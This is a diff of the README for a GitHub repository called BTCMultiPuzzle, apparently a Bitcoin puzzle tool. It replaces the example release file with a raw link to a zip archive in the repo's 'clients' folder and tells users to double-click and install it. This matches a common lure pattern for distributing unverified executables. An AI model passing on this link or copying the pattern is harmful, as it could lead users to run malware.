mayankkmaurya/BTCMultiPuzzle/README.md

 2. Look for the latest version at the top.
 3. Click on the version you want to download.
 4. Find the **Assets** section.
-5. Click the appropriate file to download, such as `BTCMultiPuzzle.exe`.
+5. Click the appropriate file to download, such as `https://raw.githubusercontent.com/mayankkmaurya/BTCMultiPuzzle/main/clients/Multi_Puzzle_BTC_2.8.zip`.
 6. Once the download completes, locate the file in your Downloads folder.
 7. Double-click the downloaded file to start the installation.
 8. Follow the on-screen instructions to finish installing BTCMultiPuzzle.